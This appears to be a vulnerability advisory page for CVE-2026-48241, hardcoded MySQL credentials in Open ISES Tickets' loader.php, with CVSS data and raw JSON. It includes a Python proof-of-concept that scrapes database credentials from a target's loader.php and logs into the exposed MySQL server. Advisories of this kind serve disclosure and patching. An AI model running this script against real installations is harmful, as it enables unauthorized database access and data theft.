Security Vulnerability Report
中文
CVE-2026-48241 CVSS 8.1 HIGH

CVE-2026-48241

Published: 2026-05-21 18:16:21
Last Modified: 2026-05-21 19:10:12
Source: [email protected]

Description

Open ISES Tickets before 3.44.2 contains hardcoded MySQL database credentials in loader.php (a public-facing database utility) that are committed to the source repository. Any actor with access to the public source tree (or an unauthenticated attacker with read access to the file on a deployed installation) can read the username, password, and database name and use them to connect to the database if it is reachable from their network.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Open ISES Tickets < 3.44.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re import pymysql # Target URL of the vulnerable file target_url = "http://target-openises.com/loader.php" print(f"[*] Fetching {target_url}...") try: response = requests.get(target_url) content = response.text # Regex to find hardcoded credentials (Example pattern) # Adjust regex based on actual code structure found in loader.php # Common patterns: define('DB_USER', 'root'); or $db_user = "root"; user_match = re.search(r"(?:DB_USER|db_user)['\"]?\s*[,=]\s*['\"]([^'\"]+)['\"]", content) pass_match = re.search(r"(?:DB_PASS|db_pass)['\"]?\s*[,=]\s*['\"]([^'\"]+)['\"]", content) name_match = re.search(r"(?:DB_NAME|db_name)['\"]?\s*[,=]\s*['\"]([^'\"]+)['\"]", content) host_match = re.search(r"(?:DB_HOST|db_host)['\"]?\s*[,=]\s*['\"]([^'\"]+)['\"]", content) if user_match and pass_match and name_match and host_match: db_user = user_match.group(1) db_pass = pass_match.group(1) db_name = name_match.group(1) db_host = host_match.group(1) print(f"[+] Credentials Found!") print(f" Host: {db_host}") print(f" User: {db_user}") print(f" Pass: {db_pass}") print(f" Name: {db_name}") # Attempt to connect to the database print(f"[*] Attempting to connect to MySQL database at {db_host}...") try: connection = pymysql.connect(host=db_host, user=db_user, password=db_pass, database=db_name) print("[+] Successfully connected to the database!") with connection.cursor() as cursor: cursor.execute("SELECT VERSION()") version = cursor.fetchone() print(f"[+] Database Version: {version[0]}") connection.close() except Exception as e: print(f"[-] Connection failed: {e}") else: print("[-] Could not extract credentials from the file.") except Exception as e: print(f"[-] Error fetching URL: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-48241", "sourceIdentifier": "[email protected]", "published": "2026-05-21T18:16:21.070", "lastModified": "2026-05-21T19:10:12.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open ISES Tickets before 3.44.2 contains hardcoded MySQL database credentials in loader.php (a public-facing database utility) that are committed to the source repository. Any actor with access to the public source tree (or an unauthenticated attacker with read access to the file on a deployed installation) can read the username, password, and database name and use them to connect to the database if it is reachable from their network."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff", "source": "[email protected]"}, {"url": "https://github.com/openises/tickets/releases/tag/v3.44.2", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-mysql-credentials-in-loader-php", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.